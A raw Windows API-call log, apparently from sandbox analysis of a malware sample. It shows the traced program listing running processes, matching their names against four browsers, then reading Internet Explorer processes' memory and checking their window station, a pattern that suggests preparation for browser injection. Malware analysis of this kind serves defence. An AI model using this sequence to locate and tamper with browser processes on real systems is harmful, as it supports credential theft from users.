	[0251.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.992] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.993] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0251.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa440
	[0251.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.994] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0251.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.994] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.994] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0251.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.995] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.995] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0251.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa444
	[0251.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.996] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0251.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.996] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.996] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0251.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.997] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.997] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0251.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa448
	[0251.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.998] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0251.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.998] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.999] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0251.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.999] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.000] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0252.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa44c
	[0252.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.001] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0252.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.001] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.001] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0252.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.001] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.001] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0252.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa450
	[0252.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.002] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0252.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.003] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.004] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0252.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.004] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.004] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0252.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa454
	[0252.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.005] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0252.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.006] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.006] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0252.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.007] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.007] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0252.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa458
	[0252.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.008] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0252.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.008] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.008] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0252.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.009] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.009] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0252.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa45c
	[0252.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.010] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0252.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.010] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.010] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0252.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.011] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.011] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0252.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa460
	[0252.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.012] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0252.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.012] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.012] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0252.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.013] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.013] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0252.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa464
	[0252.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.014] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0252.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.015] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.015] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0252.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.016] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.016] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0252.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa468
	[0252.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.017] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0252.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.018] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.018] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0252.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.022] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0252.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa46c
	[0252.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.024] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0252.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.024] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.025] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0252.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.026] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.026] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0252.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa470
	[0252.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.027] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0252.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.027] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.028] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0252.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.028] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.029] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0252.029] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa474
	[0252.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.030] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0252.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.030] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0252.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.030] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0252.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.030] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.031] NtQueryInformationProcess (in: ProcessHandle=0xa474, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0252.031] ReadProcessMemory (in: hProcess=0xa474, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0252.031] ReadProcessMemory (in: hProcess=0xa474, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0252.031] ReadProcessMemory (in: hProcess=0xa474, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0252.031] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0252.031] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0252.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa478
	[0252.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.032] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0252.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.033] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0252.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.033] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0252.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.033] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.033] NtQueryInformationProcess (in: ProcessHandle=0xa478, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0252.033] ReadProcessMemory (in: hProcess=0xa478, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0252.033] ReadProcessMemory (in: hProcess=0xa478, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0252.034] ReadProcessMemory (in: hProcess=0xa478, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0252.034] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0252.034] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0252.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa47c
	[0252.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.035] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0252.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.035] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.035] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0252.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.036] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.036] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0252.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa480
	[0252.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.037] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0252.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.037] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.037] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0252.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.038] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.038] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.039] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa484
	[0252.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.039] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.039] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.040] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.040] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.040] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa488
	[0252.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.042] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.042] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.043] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.043] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.043] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa48c
	[0252.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.044] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.044] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.045] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.045] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.045] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0252.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa490
	[0252.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.046] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0252.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.046] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.047] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0252.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.047] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.047] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa494
	[0252.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.048] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.049] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.049] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.049] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.049] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
